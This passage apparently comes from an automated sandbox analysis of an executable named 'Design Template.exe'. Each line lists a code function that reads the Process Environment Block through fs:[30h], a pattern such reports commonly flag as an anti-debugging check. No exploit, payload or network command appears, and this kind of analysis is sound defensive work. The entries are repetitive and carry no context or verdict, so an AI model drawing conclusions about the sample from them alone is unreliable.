Source: C:\Users\user\Desktop\Design Template.exe Code function: 2_2_0043A6E8 mov eax, dword ptr fs:[00000030h] 2_2_0043A6E8
Source: C:\Users\user\Desktop\Design Template.exe Code function: 2_2_0043A6F8 mov eax, dword ptr fs:[00000030h] 2_2_0043A6F8
Source: C:\Users\user\Desktop\Design Template.exe Code function: 2_2_00435F68 mov ecx, dword ptr fs:[00000030h] 2_2_00435F68
Source: C:\Users\user\Desktop\Design Template.exe Code function: 2_2_0043A718 mov eax, dword ptr fs:[00000030h] 2_2_0043A718
Source: C:\Users\user\Desktop\Design Template.exe Code function: 2_2_0043A7B8 mov eax, dword ptr fs:[00000030h] 2_2_0043A7B8
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A320A0 mov eax, dword ptr fs:[00000030h] 4_2_00A320A0
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A320A0 mov eax, dword ptr fs:[00000030h] 4_2_00A320A0
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A320A0 mov eax, dword ptr fs:[00000030h] 4_2_00A320A0
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A320A0 mov eax, dword ptr fs:[00000030h] 4_2_00A320A0
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A320A0 mov eax, dword ptr fs:[00000030h] 4_2_00A320A0
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A320A0 mov eax, dword ptr fs:[00000030h] 4_2_00A320A0
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A490AF mov eax, dword ptr fs:[00000030h] 4_2_00A490AF
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A3F0BF mov ecx, dword ptr fs:[00000030h] 4_2_00A3F0BF
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A3F0BF mov eax, dword ptr fs:[00000030h] 4_2_00A3F0BF
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A3F0BF mov eax, dword ptr fs:[00000030h] 4_2_00A3F0BF
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A09080 mov eax, dword ptr fs:[00000030h] 4_2_00A09080
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A83884 mov eax, dword ptr fs:[00000030h] 4_2_00A83884
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A83884 mov eax, dword ptr fs:[00000030h] 4_2_00A83884
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A058EC mov eax, dword ptr fs:[00000030h] 4_2_00A058EC
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A9B8D0 mov eax, dword ptr fs:[00000030h] 4_2_00A9B8D0
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A9B8D0 mov ecx, dword ptr fs:[00000030h] 4_2_00A9B8D0
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A9B8D0 mov eax, dword ptr fs:[00000030h] 4_2_00A9B8D0
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A9B8D0 mov eax, dword ptr fs:[00000030h] 4_2_00A9B8D0
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A9B8D0 mov eax, dword ptr fs:[00000030h] 4_2_00A9B8D0
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A9B8D0 mov eax, dword ptr fs:[00000030h] 4_2_00A9B8D0
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A1B02A mov eax, dword ptr fs:[00000030h] 4_2_00A1B02A
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A1B02A mov eax, dword ptr fs:[00000030h] 4_2_00A1B02A
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A1B02A mov eax, dword ptr fs:[00000030h] 4_2_00A1B02A
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A1B02A mov eax, dword ptr fs:[00000030h] 4_2_00A1B02A
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A3002D mov eax, dword ptr fs:[00000030h] 4_2_00A3002D
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A3002D mov eax, dword ptr fs:[00000030h] 4_2_00A3002D
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A3002D mov eax, dword ptr fs:[00000030h] 4_2_00A3002D
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A3002D mov eax, dword ptr fs:[00000030h] 4_2_00A3002D
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A3002D mov eax, dword ptr fs:[00000030h] 4_2_00A3002D
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00AD4015 mov eax, dword ptr fs:[00000030h] 4_2_00AD4015
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00AD4015 mov eax, dword ptr fs:[00000030h] 4_2_00AD4015
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A87016 mov eax, dword ptr fs:[00000030h] 4_2_00A87016
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A87016 mov eax, dword ptr fs:[00000030h] 4_2_00A87016
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A87016 mov eax, dword ptr fs:[00000030h] 4_2_00A87016
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00AD1074 mov eax, dword ptr fs:[00000030h] 4_2_00AD1074
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00AC2073 mov eax, dword ptr fs:[00000030h] 4_2_00AC2073
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A20050 mov eax, dword ptr fs:[00000030h] 4_2_00A20050
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A20050 mov eax, dword ptr fs:[00000030h] 4_2_00A20050
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A361A0 mov eax, dword ptr fs:[00000030h] 4_2_00A361A0
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A361A0 mov eax, dword ptr fs:[00000030h] 4_2_00A361A0
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A869A6 mov eax, dword ptr fs:[00000030h] 4_2_00A869A6
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A851BE mov eax, dword ptr fs:[00000030h] 4_2_00A851BE
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A851BE mov eax, dword ptr fs:[00000030h] 4_2_00A851BE
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A851BE mov eax, dword ptr fs:[00000030h] 4_2_00A851BE
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A851BE mov eax, dword ptr fs:[00000030h] 4_2_00A851BE
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A2C182 mov eax, dword ptr fs:[00000030h] 4_2_00A2C182
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A3A185 mov eax, dword ptr fs:[00000030h] 4_2_00A3A185
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A32990 mov eax, dword ptr fs:[00000030h] 4_2_00A32990
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A941E8 mov eax, dword ptr fs:[00000030h] 4_2_00A941E8
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A0B1E1 mov eax, dword ptr fs:[00000030h] 4_2_00A0B1E1
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A0B1E1 mov eax, dword ptr fs:[00000030h] 4_2_00A0B1E1
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A0B1E1 mov eax, dword ptr fs:[00000030h] 4_2_00A0B1E1
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A24120 mov eax, dword ptr fs:[00000030h] 4_2_00A24120
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A24120 mov eax, dword ptr fs:[00000030h] 4_2_00A24120
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A24120 mov eax, dword ptr fs:[00000030h] 4_2_00A24120
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A24120 mov eax, dword ptr fs:[00000030h] 4_2_00A24120
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A24120 mov ecx, dword ptr fs:[00000030h] 4_2_00A24120
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A3513A mov eax, dword ptr fs:[00000030h] 4_2_00A3513A
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A3513A mov eax, dword ptr fs:[00000030h] 4_2_00A3513A
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A09100 mov eax, dword ptr fs:[00000030h] 4_2_00A09100
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A09100 mov eax, dword ptr fs:[00000030h] 4_2_00A09100
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A09100 mov eax, dword ptr fs:[00000030h] 4_2_00A09100
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A0C962 mov eax, dword ptr fs:[00000030h] 4_2_00A0C962
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A0B171 mov eax, dword ptr fs:[00000030h] 4_2_00A0B171
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A0B171 mov eax, dword ptr fs:[00000030h] 4_2_00A0B171
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A2B944 mov eax, dword ptr fs:[00000030h] 4_2_00A2B944
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A2B944 mov eax, dword ptr fs:[00000030h] 4_2_00A2B944
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A052A5 mov eax, dword ptr fs:[00000030h] 4_2_00A052A5
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A052A5 mov eax, dword ptr fs:[00000030h] 4_2_00A052A5
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A052A5 mov eax, dword ptr fs:[00000030h] 4_2_00A052A5
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A052A5 mov eax, dword ptr fs:[00000030h] 4_2_00A052A5
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A052A5 mov eax, dword ptr fs:[00000030h] 4_2_00A052A5
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A1AAB0 mov eax, dword ptr fs:[00000030h] 4_2_00A1AAB0
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A1AAB0 mov eax, dword ptr fs:[00000030h] 4_2_00A1AAB0
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A3FAB0 mov eax, dword ptr fs:[00000030h] 4_2_00A3FAB0
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A3D294 mov eax, dword ptr fs:[00000030h] 4_2_00A3D294
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A3D294 mov eax, dword ptr fs:[00000030h] 4_2_00A3D294
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A32AE4 mov eax, dword ptr fs:[00000030h] 4_2_00A32AE4
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A32ACB mov eax, dword ptr fs:[00000030h] 4_2_00A32ACB
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A44A2C mov eax, dword ptr fs:[00000030h] 4_2_00A44A2C
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A44A2C mov eax, dword ptr fs:[00000030h] 4_2_00A44A2C
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A18A0A mov eax, dword ptr fs:[00000030h] 4_2_00A18A0A
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A05210 mov eax, dword ptr fs:[00000030h] 4_2_00A05210
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A05210 mov ecx, dword ptr fs:[00000030h] 4_2_00A05210
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A05210 mov eax, dword ptr fs:[00000030h] 4_2_00A05210
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A05210 mov eax, dword ptr fs:[00000030h] 4_2_00A05210
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A0AA16 mov eax, dword ptr fs:[00000030h] 4_2_00A0AA16
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A0AA16 mov eax, dword ptr fs:[00000030h] 4_2_00A0AA16
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00ACAA16 mov eax, dword ptr fs:[00000030h] 4_2_00ACAA16
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00ACAA16 mov eax, dword ptr fs:[00000030h] 4_2_00ACAA16
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A23A1C mov eax, dword ptr fs:[00000030h] 4_2_00A23A1C
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00ABB260 mov eax, dword ptr fs:[00000030h] 4_2_00ABB260
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00ABB260 mov eax, dword ptr fs:[00000030h] 4_2_00ABB260
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00AD8A62 mov eax, dword ptr fs:[00000030h] 4_2_00AD8A62
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A4927A mov eax, dword ptr fs:[00000030h] 4_2_00A4927A
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A09240 mov eax, dword ptr fs:[00000030h] 4_2_00A09240
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A09240 mov eax, dword ptr fs:[00000030h] 4_2_00A09240
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A09240 mov eax, dword ptr fs:[00000030h] 4_2_00A09240
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A09240 mov eax, dword ptr fs:[00000030h] 4_2_00A09240
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00ACEA55 mov eax, dword ptr fs:[00000030h] 4_2_00ACEA55
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A94257 mov eax, dword ptr fs:[00000030h] 4_2_00A94257
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00AD5BA5 mov eax, dword ptr fs:[00000030h] 4_2_00AD5BA5
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A34BAD mov eax, dword ptr fs:[00000030h] 4_2_00A34BAD
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A34BAD mov eax, dword ptr fs:[00000030h] 4_2_00A34BAD
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A34BAD mov eax, dword ptr fs:[00000030h] 4_2_00A34BAD
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00AC138A mov eax, dword ptr fs:[00000030h] 4_2_00AC138A
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00ABD380 mov ecx, dword ptr fs:[00000030h] 4_2_00ABD380
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A11B8F mov eax, dword ptr fs:[00000030h] 4_2_00A11B8F
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A11B8F mov eax, dword ptr fs:[00000030h] 4_2_00A11B8F
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A3B390 mov eax, dword ptr fs:[00000030h] 4_2_00A3B390
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A32397 mov eax, dword ptr fs:[00000030h] 4_2_00A32397
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A303E2 mov eax, dword ptr fs:[00000030h] 4_2_00A303E2
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A303E2 mov eax, dword ptr fs:[00000030h] 4_2_00A303E2
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A303E2 mov eax, dword ptr fs:[00000030h] 4_2_00A303E2
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A303E2 mov eax, dword ptr fs:[00000030h] 4_2_00A303E2
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A303E2 mov eax, dword ptr fs:[00000030h] 4_2_00A303E2
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A303E2 mov eax, dword ptr fs:[00000030h] 4_2_00A303E2
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A2DBE9 mov eax, dword ptr fs:[00000030h] 4_2_00A2DBE9
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A853CA mov eax, dword ptr fs:[00000030h] 4_2_00A853CA
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A853CA mov eax, dword ptr fs:[00000030h] 4_2_00A853CA
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00AC131B mov eax, dword ptr fs:[00000030h] 4_2_00AC131B
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A0DB60 mov ecx, dword ptr fs:[00000030h] 4_2_00A0DB60
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A33B7A mov eax, dword ptr fs:[00000030h] 4_2_00A33B7A
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A33B7A mov eax, dword ptr fs:[00000030h] 4_2_00A33B7A
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A0DB40 mov eax, dword ptr fs:[00000030h] 4_2_00A0DB40
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00AD8B58 mov eax, dword ptr fs:[00000030h] 4_2_00AD8B58
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A0F358 mov eax, dword ptr fs:[00000030h] 4_2_00A0F358
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A1849B mov eax, dword ptr fs:[00000030h] 4_2_00A1849B
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00AC14FB mov eax, dword ptr fs:[00000030h] 4_2_00AC14FB
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A86CF0 mov eax, dword ptr fs:[00000030h] 4_2_00A86CF0
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A86CF0 mov eax, dword ptr fs:[00000030h] 4_2_00A86CF0
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A86CF0 mov eax, dword ptr fs:[00000030h] 4_2_00A86CF0
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00AD8CD6 mov eax, dword ptr fs:[00000030h] 4_2_00AD8CD6
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A3BC2C mov eax, dword ptr fs:[00000030h] 4_2_00A3BC2C
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00AD740D mov eax, dword ptr fs:[00000030h] 4_2_00AD740D
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00AD740D mov eax, dword ptr fs:[00000030h] 4_2_00AD740D
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00AD740D mov eax, dword ptr fs:[00000030h] 4_2_00AD740D
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A86C0A mov eax, dword ptr fs:[00000030h] 4_2_00A86C0A
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A86C0A mov eax, dword ptr fs:[00000030h] 4_2_00A86C0A
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A86C0A mov eax, dword ptr fs:[00000030h] 4_2_00A86C0A
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A86C0A mov eax, dword ptr fs:[00000030h] 4_2_00A86C0A
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00AC1C06 mov eax, dword ptr fs:[00000030h] 4_2_00AC1C06
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00AC1C06 mov eax, dword ptr fs:[00000030h] 4_2_00AC1C06
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00AC1C06 mov eax, dword ptr fs:[00000030h] 4_2_00AC1C06
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00AC1C06 mov eax, dword ptr fs:[00000030h] 4_2_00AC1C06
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00AC1C06 mov eax, dword ptr fs:[00000030h] 4_2_00AC1C06
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00AC1C06 mov eax, dword ptr fs:[00000030h] 4_2_00AC1C06
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00AC1C06 mov eax, dword ptr fs:[00000030h] 4_2_00AC1C06
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00AC1C06 mov eax, dword ptr fs:[00000030h] 4_2_00AC1C06
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00AC1C06 mov eax, dword ptr fs:[00000030h] 4_2_00AC1C06
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00AC1C06 mov eax, dword ptr fs:[00000030h] 4_2_00AC1C06
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00AC1C06 mov eax, dword ptr fs:[00000030h] 4_2_00AC1C06
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00AC1C06 mov eax, dword ptr fs:[00000030h] 4_2_00AC1C06
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00AC1C06 mov eax, dword ptr fs:[00000030h] 4_2_00AC1C06
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00AC1C06 mov eax, dword ptr fs:[00000030h] 4_2_00AC1C06
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A2746D mov eax, dword ptr fs:[00000030h] 4_2_00A2746D
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A3A44B mov eax, dword ptr fs:[00000030h] 4_2_00A3A44B
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A9C450 mov eax, dword ptr fs:[00000030h] 4_2_00A9C450
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A9C450 mov eax, dword ptr fs:[00000030h] 4_2_00A9C450
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00AD05AC mov eax, dword ptr fs:[00000030h] 4_2_00AD05AC
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00AD05AC mov eax, dword ptr fs:[00000030h] 4_2_00AD05AC
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A335A1 mov eax, dword ptr fs:[00000030h] 4_2_00A335A1
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A31DB5 mov eax, dword ptr fs:[00000030h] 4_2_00A31DB5
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A31DB5 mov eax, dword ptr fs:[00000030h] 4_2_00A31DB5
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A31DB5 mov eax, dword ptr fs:[00000030h] 4_2_00A31DB5
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A32581 mov eax, dword ptr fs:[00000030h] 4_2_00A32581
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A32581 mov eax, dword ptr fs:[00000030h] 4_2_00A32581
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A32581 mov eax, dword ptr fs:[00000030h] 4_2_00A32581
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A32581 mov eax, dword ptr fs:[00000030h] 4_2_00A32581
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A02D8A mov eax, dword ptr fs:[00000030h] 4_2_00A02D8A
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A02D8A mov eax, dword ptr fs:[00000030h] 4_2_00A02D8A
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A02D8A mov eax, dword ptr fs:[00000030h] 4_2_00A02D8A
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A02D8A mov eax, dword ptr fs:[00000030h] 4_2_00A02D8A
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A02D8A mov eax, dword ptr fs:[00000030h] 4_2_00A02D8A
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A3FD9B mov eax, dword ptr fs:[00000030h] 4_2_00A3FD9B
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A3FD9B mov eax, dword ptr fs:[00000030h] 4_2_00A3FD9B
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A1D5E0 mov eax, dword ptr fs:[00000030h] 4_2_00A1D5E0
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A1D5E0 mov eax, dword ptr fs:[00000030h] 4_2_00A1D5E0
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00ACFDE2 mov eax, dword ptr fs:[00000030h] 4_2_00ACFDE2
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00ACFDE2 mov eax, dword ptr fs:[00000030h] 4_2_00ACFDE2
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00ACFDE2 mov eax, dword ptr fs:[00000030h] 4_2_00ACFDE2
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00ACFDE2 mov eax, dword ptr fs:[00000030h] 4_2_00ACFDE2
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00AB8DF1 mov eax, dword ptr fs:[00000030h] 4_2_00AB8DF1
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A86DC9 mov eax, dword ptr fs:[00000030h] 4_2_00A86DC9
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A86DC9 mov eax, dword ptr fs:[00000030h] 4_2_00A86DC9
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A86DC9 mov eax, dword ptr fs:[00000030h] 4_2_00A86DC9
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A86DC9 mov ecx, dword ptr fs:[00000030h] 4_2_00A86DC9
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A86DC9 mov eax, dword ptr fs:[00000030h] 4_2_00A86DC9
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A86DC9 mov eax, dword ptr fs:[00000030h] 4_2_00A86DC9
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A0AD30 mov eax, dword ptr fs:[00000030h] 4_2_00A0AD30
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A13D34 mov eax, dword ptr fs:[00000030h] 4_2_00A13D34
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A13D34 mov eax, dword ptr fs:[00000030h] 4_2_00A13D34
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A13D34 mov eax, dword ptr fs:[00000030h] 4_2_00A13D34
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A13D34 mov eax, dword ptr fs:[00000030h] 4_2_00A13D34
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A13D34 mov eax, dword ptr fs:[00000030h] 4_2_00A13D34
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A13D34 mov eax, dword ptr fs:[00000030h] 4_2_00A13D34
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A13D34 mov eax, dword ptr fs:[00000030h] 4_2_00A13D34
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A13D34 mov eax, dword ptr fs:[00000030h] 4_2_00A13D34
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A13D34 mov eax, dword ptr fs:[00000030h] 4_2_00A13D34
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A13D34 mov eax, dword ptr fs:[00000030h] 4_2_00A13D34
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A13D34 mov eax, dword ptr fs:[00000030h] 4_2_00A13D34
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A13D34 mov eax, dword ptr fs:[00000030h] 4_2_00A13D34
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A13D34 mov eax, dword ptr fs:[00000030h] 4_2_00A13D34
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00ACE539 mov eax, dword ptr fs:[00000030h] 4_2_00ACE539
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A34D3B mov eax, dword ptr fs:[00000030h] 4_2_00A34D3B
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A34D3B mov eax, dword ptr fs:[00000030h] 4_2_00A34D3B
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A34D3B mov eax, dword ptr fs:[00000030h] 4_2_00A34D3B
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00AD8D34 mov eax, dword ptr fs:[00000030h] 4_2_00AD8D34
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A8A537 mov eax, dword ptr fs:[00000030h] 4_2_00A8A537
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A2C577 mov eax, dword ptr fs:[00000030h] 4_2_00A2C577
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A2C577 mov eax, dword ptr fs:[00000030h] 4_2_00A2C577
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A43D43 mov eax, dword ptr fs:[00000030h] 4_2_00A43D43
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A83540 mov eax, dword ptr fs:[00000030h] 4_2_00A83540
